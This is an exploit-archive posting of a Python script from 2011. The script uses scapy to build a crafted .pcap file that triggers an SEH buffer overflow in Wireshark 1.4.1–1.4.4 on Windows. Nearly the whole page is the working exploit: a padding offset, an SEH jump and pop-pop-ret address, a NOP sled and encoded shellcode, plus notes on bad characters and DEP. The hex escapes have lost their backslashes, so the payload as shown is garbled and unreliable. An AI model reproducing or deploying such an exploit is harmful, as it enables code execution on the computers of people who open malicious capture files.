Home / exploits Wireshark 1.4.4 SEH Overflow
Posted on 19 April 2011
#!/usr/bin/env python # Vulnerable app: Wireshark 1.4.1-1.4.4 # Author: sickness # Download : # OS: Tested it on Windows XP SP2 and SP3 but it should work on every Windows with DEP off (still working on a ROP exploit) # DATE : 17.04.2011 # Fixed in latest version 1.4.5 # DO NOT FORGET TO FEEL THE PWNSAUCE WITH: http://redmine.corelan.be:8800/projects/pvefindaddr ################################################################### # Offset might change! # Watch out for other bad chars!! # Current bad chars: x00x0ax0dx09 ################################################################### # References: # https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=5836 # https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=5838 ################################################################### import sys from scapy.all import * #payload=calc.exe #ppr is from a non-ASLR enabled wireshark module evil = Ether(type=0x2323)/("x41" * 1239 + "xebx06x90x90" + "x5Dx10x94x62" + "x90" * 16 + "x33xc9x83xe9xcexe8xffxffxffxffxc0x5ex81x76x0ex17x22xfdx6ax83xeexfcxe2xf4xebxcax74x6ax17x22x9dxe3xf2x13x2fx0ex9cx70xcdxe1x45x2ex76x38x03xa9x8fx42x18x95xb7x4cx26xddxccxaaxbbx1ex9cx16x15x0exddxabxd8x2fxfcxadxf5xd2xafx3dx9cx70xedxe1x55x1exfcxbax9cx62x85xefxd7x56xb7x6bxc7x72x76x22x0fxa9xa5x4ax16xf1x1ex56x5exa9xc9xe1x16xf4xccx95x26xe2x51xabxd8x2fxfcxadx2fxc2x88x9ex14x5fx05x51x6ax06x88x88x4fxa9xa5x4ex16xf1x9bxe1x1bx69x76x32x0bx23x2exe1x13xa9xfcxbax9ex66xd9x4ex4cx79x9cx33x4dx73x02x8ax4fx7dxa7xe1x05xc9x7bx37x7dx23x70xefxaex22xfdx6ax47x4axccxe1x78xa5x02xbfxacxd2x48xc8x41x4ax5bxffxaaxbfx02xbfx2bx24x81x60x97xd9x1dx1fx12x99xbax79x65x4dx97x6ax44xddx28x09x76x4ex9ex44x72x5ax98x6a" + "x90" * 4500) wrpcap("evil.pcap",evil) print " " print "Evil .pcap file created!" print "It's pwnsauce time! "
